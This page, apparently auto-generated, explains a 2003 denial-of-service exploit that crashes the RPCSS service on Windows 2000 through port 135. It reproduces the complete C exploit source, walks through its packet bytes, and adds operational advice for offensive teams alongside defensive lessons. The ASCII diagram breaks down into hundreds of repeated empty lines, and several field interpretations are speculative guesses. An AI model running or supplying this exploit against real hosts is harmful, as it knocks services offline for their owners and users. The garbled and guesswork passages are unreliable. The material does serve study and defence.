By exploitdb papers bot•July 21, 2003•
papers
Understanding the RPC DCOM Interface Denial of Service Exploit (Paper ID 61)
Understanding the RPC DCOM Interface Denial of Service Exploit (Paper ID 61)
What this paper is
This paper details a Denial of Service (DoS) vulnerability in Microsoft Windows Server 2000's implementation of the Remote Procedure Call (RPC) Distributed Component Object Model (DCOM) interface. The exploit, discovered by Xfocus.org and coded by FlashSky, targets a specific flaw that allows an attacker to crash the RPCSS service, leading to a system-wide denial of service. It is explicitly stated that this is not the MS03-026 vulnerability.
Simple technical breakdown
The exploit works by sending specially crafted RPC DCOM packets to the target server on port 135 (the standard RPC/DCOM port). These packets are designed to overload or mismanage a resource within the RPCSS service. When the service attempts to process these malformed requests, it enters an unstable state and crashes. This crash prevents legitimate RPC/DCOM communication, effectively making the server unavailable for services that rely on it.
The exploit uses two main data structures: bindstr and request.
bindstr: This appears to be an initial RPC binding request. It likely tries to establish a connection or query for available services within the DCOM interface.request: This is the core of the DoS payload. It contains a sequence of '31' bytes, which is unusual and likely intended to trigger the vulnerability by causing an unexpected condition or buffer overflow within the RPCSS service.
The C code orchestrates sending these crafted packets over a TCP socket to the target's port 135.
Complete code and payload walkthrough
The provided C code implements a simple network client to exploit the vulnerability.
Includes:
winsock2.h: For Windows Sockets API functions (network communication).stdio.h: For standard input/output functions likeprintf.windows.h: For Windows-specific API functions.process.h: For process control functions (thoughexitis used, which is instdlib.horstdio.hgenerally).string.h: For string manipulation functions.winbase.h: For Windows Base API functions.
Global Data:
unsigned char bindstr[]: This array holds the bytes for the initial RPC binding request.0x05, 0x00, 0x0B, 0x03, 0x10, 0x00, 0x00, 0x00: These bytes likely represent the RPC version, call type, and length of the subsequent data.0x48, 0x00, 0x00, 0x00: This might indicate the maximum transmit/receive fragment size.0x7F, 0x00, 0x00, 0x00: This could be a network address or identifier.0xD0, 0x16, 0xD0, 0x16, 0x00, 0x00, 0x00, 0x00: This sequence is characteristic of RPC/DCOM packet structures, possibly related to the interface UUID or operation number.0x01, 0x00, 0x00, 0x00: Likely a sequence number or call ID.0x01, 0x00, 0x01, 0x00: Could represent the number of authentication information elements or other flags.0xA0, 0x01, 0x00, 0x00: Possibly related to the authentication level or type.0x00, 0x00, 0x00, 0x00: Padding or null fields.0xC0, 0x00, 0x00, 0x00: Another potential size or identifier field.0x00, 0x00, 0x00, 0x46: More header information.0x00, 0x00, 0x00, 0x00: Padding.0x04, 0x5D, 0x88, 0x8A, 0xEB, 0x1C, 0xC9, 0x11, 0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60: This is a 16-byte sequence, which strongly suggests it's a UUID (Universally Unique Identifier). This specific UUID is associated with the DCOM Remote Protocol.0x02, 0x00, 0x00, 0x00: Likely a minor version or operation code.
unsigned char request[]: This array contains the malicious payload designed to trigger the DoS.0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00: Similar RPC header asbindstr.0x48, 0x00, 0x00, 0x00: Max fragment size.0x13, 0x00, 0x00, 0x00: Length of the subsequent data.0x90, 0x00, 0x00, 0x00: Possibly an operation code or identifier.0x01, 0x00, 0x03, 0x00: Flags or sequence information.0x05, 0x00, 0x06, 0x01: More RPC/DCOM specific fields.0x00, 0x00, 0x00, 0x00: Padding.0x31, 0x31, 0x31, 0x31, ... (repeated 32 times): This is the critical part of the payload. The character '1' (ASCII 0x31) repeated many times is highly unusual for standard RPC/DCOM operations. This repetition is likely what causes the RPCSS service to misbehave, potentially leading to a buffer overflow, infinite loop, or resource exhaustion.0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00: Trailing null bytes, possibly for padding or termination.
main function:
Initialization:
WSADATA WSAData;: Initializes the Windows Sockets library.SOCKET sock;: Declares a socket variable.SOCKADDR_IN addr_in;: Declares a structure for IP address and port.short port = 135;: Sets the target port to 135, the standard for RPC/DCOM.unsigned char buf1[0x1000];: A buffer to receive data (though its use is limited).- Prints introductory messages about the vulnerability and its discoverers.
Argument Check:
if (argc < 2): Checks if a target IP address was provided as a command-line argument.- If not, it prints usage instructions and exits.
WSAStartup:
if (WSAStartup(MAKEWORD(2,0), &WSAData) != 0): Initializes the Winsock DLL. If it fails, it prints an error and returns.
Address Setup:
addr_in.sin_family = AF_INET;: Sets the address family to IPv4.addr_in.sin_port = htons(port);: Sets the port to 135, converting it to network byte order.addr_in.sin_addr.S_un.S_addr = inet_addr(argv[1]);: Converts the target IP address string (fromargv[1]) into a network address format.
Socket Creation:
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET): Creates a TCP socket. If it fails, it prints an error and returns.
Connection:
if (WSAConnect(sock, (struct sockaddr *)&addr_in, sizeof(addr_in), NULL, NULL, NULL, NULL) == SOCKET_ERROR): Connects the socket to the target IP address and port 135. If it fails, it prints an error and returns.
First Send (
bindstr):if (send(sock, bindstr, sizeof(bindstr), 0) == SOCKET_ERROR): Sends thebindstrdata to the target. This is likely an attempt to initiate an RPC binding process. If it fails, it prints an error and returns.i = recv(sock, buf1, 1024, MSG_PEEK);: This line attempts to peek at incoming data without removing it from the receive buffer. It's unclear whyMSG_PEEKis used here, as the data is not consumed. It might be an artifact or an attempt to see if the server responds before sending the actual payload.
Second Send (
request):if (send(sock, request, sizeof(request), 0) == SOCKET_ERROR): Sends the maliciousrequestpayload to the target. This is the packet designed to trigger the DoS. If it fails, it prints an error and returns.i = recv(sock, buf1, 1024, MSG_PEEK);: AnotherrecvwithMSG_PEEK. Again, the purpose is not fully clear for a DoS exploit that aims to crash the service. It might be an attempt to confirm the connection is still open or to observe any immediate (non-crashing) response before the service is expected to crash.
Code Fragment/Block -> Practical Purpose Mapping:
unsigned char bindstr[]: Initial RPC binding request packet.unsigned char request[]: Malicious payload packet containing repeated '1' characters.WSADATA WSAData;: Variable to hold Winsock initialization data.SOCKET sock;: Variable to hold the network socket descriptor.SOCKADDR_IN addr_in;: Structure to define the target IP address and port.short port=135;: Target port for RPC/DCOM.unsigned char buf1[0x1000];: Buffer for receiving data (used withMSG_PEEK).WSAStartup(...): Initializes the Winsock library.socket(...): Creates a TCP socket.inet_addr(argv[1]): Converts the target IP string to a network address.WSAConnect(...): Establishes a TCP connection to the target.send(sock, bindstr, ...): Sends the initial RPC binding packet.recv(sock, buf1, ..., MSG_PEEK): Peeks at incoming data (purpose unclear for DoS).send(sock, request, ...): Sends the malicious DoS payload.exit(1): Terminates the program with an error code.
Practical details for offensive operations teams
- Required Access Level: Network access to the target's port 135 (TCP). No elevated privileges on the target system are required for the execution of this exploit, as it's a network-based DoS.
- Lab Preconditions:
- A Windows Server 2000 (or potentially other vulnerable Windows versions with the same RPC DCOM implementation) system is required for testing.
- The target system must be accessible over the network on TCP port 135.
- Firewalls must allow traffic to port 135.
- Tooling Assumptions:
- A C compiler (like MinGW or Visual Studio) to compile the provided C code into an executable.
- A network scanner (like Nmap) to identify open port 135 on potential targets.
- Execution Pitfalls:
- False Positives: The exploit might fail if the target system is not running Windows Server 2000 or a similarly vulnerable version, or if the specific RPC DCOM service is not exposed or is patched.
- Network Latency/Packet Loss: Unreliable network conditions could lead to the packets not being received correctly, preventing the DoS.
- IDS/IPS Evasion: Modern Intrusion Detection/Prevention Systems (IDS/IPS) might detect the unusual packet structure or the connection to port 135 from an unknown source, blocking the attack. The
MSG_PEEKusage might be an attempt to be stealthy, but thesendoperations are still detectable. - Targeted Service: The exploit targets the RPCSS service. If this service is heavily protected or if the system is configured to restart it automatically and quickly, the DoS might be temporary.
- No Confirmation: The exploit doesn't explicitly confirm the DoS has occurred. Operators would typically rely on external checks (e.g., ping failure, inability to connect to other services) to verify the impact.
- Recompilation: The exploit code needs to be compiled on a Windows environment or a cross-compilation setup.
- Tradecraft Considerations:
- Reconnaissance: Prior to execution, identify target IP addresses and confirm open port 135. Use tools like Nmap with appropriate scripts to fingerprint services.
- Stealth: The exploit is a raw TCP connection and send. It's not designed for stealth. For more covert operations, one would need to layer this within other protocols or use more sophisticated evasion techniques, which are not present in this basic exploit.
- Impact Assessment: Understand that this is a DoS. The goal is to disrupt service, not gain access. Ensure this aligns with the authorized engagement's objectives.
- Post-Exploitation (DoS): After a successful DoS, the next steps would depend on the engagement's goals. This might involve observing system behavior, attempting to gain access to a now-unprotected or misconfigured system (though this exploit doesn't provide that capability), or simply documenting the impact.
Where this was used and when
- Context: This exploit targets a vulnerability in Microsoft Windows Server 2000's RPC DCOM interface. Such vulnerabilities were actively sought and exploited in the early 2000s, a period when DCOM was widely used for inter-process communication and remote administration.
- Approximate Year/Date: The paper was published on 2003-07-21. This indicates the vulnerability was likely discovered and weaponized around or before this date. Exploits of this nature were common in the years leading up to and following 2003, as security researchers and attackers explored the complexities of Windows networking services.
Defensive lessons for modern teams
- Patch Management: The most crucial defense is to keep operating systems and services patched. While Windows Server 2000 is long out of support, this principle applies to all current systems. Vendors release patches to fix such vulnerabilities.
- Network Segmentation and Firewalls: Restrict access to critical ports like 135 (RPC/DCOM) to only trusted internal networks or specific management workstations. External exposure of port 135 is highly discouraged.
- Intrusion Detection/Prevention Systems (IDS/IPS): Deploy and maintain IDS/IPS solutions that can detect anomalous network traffic patterns, including malformed packets or unusual sequences of RPC/DCOM calls. Signature-based detection for known exploits and anomaly-based detection for deviations from normal traffic are key.
- Service Hardening: Understand the services running on your network. For DCOM, consider disabling it where not strictly necessary or limiting its configuration to reduce the attack surface.
- Vulnerability Scanning: Regularly scan your network for open ports and known vulnerabilities. This helps identify systems that might be susceptible to exploits like this.
- Logging and Monitoring: Ensure robust logging for network connections and service events. Monitoring logs can help detect attempted or successful exploitation attempts, even if the exploit itself is blocked.
ASCII visual (if applicable)
This exploit involves a simple client-server interaction over TCP. A visual representation of the connection and data flow would be:
+-----------------+ TCP Port 135 +---------------------+
| Attacker Client | ----------------------> | Target Server |
| (Exploit Code) | | (Windows Server 2000)|
+-----------------+ +---------------------+
| |
| 1. Send bindstr |
| (RPC Binding Request) |
|-------------------------------------------->|
| |
| 2. Send request |
| (Malicious DoS Payload) |
|-------------------------------------------->|
| |
| (Optional: Peek at response) |
|<--------------------------------------------|
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
---
## Original Exploit-DB Content (Verbatim)
```text
// This is a new unpatched vulnerability - NOT the MS03-026
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
void main(int argc,char ** argv)
{
WSADATA WSAData;
int i;
SOCKET sock;
SOCKADDR_IN addr_in;
short port=135;
unsigned char buf1[0x1000];
printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n");
printf("Code by FlashSky,Flashsky xfocus org,benjurry,benjurry xfocus org\n");
printf("Welcome to http://www.xfocus.net\n");
if(argc<2)
{
printf("useage:%s target\n",argv[0]);
exit(1);
}
if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
return;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(port);
addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
printf("Socket failed.Error:%d\n",WSAGetLastError());
return;
}
if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
printf("Connect failed.Error:%d",WSAGetLastError());
return;
}
if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
}
// milw0rm.com [2003-07-21]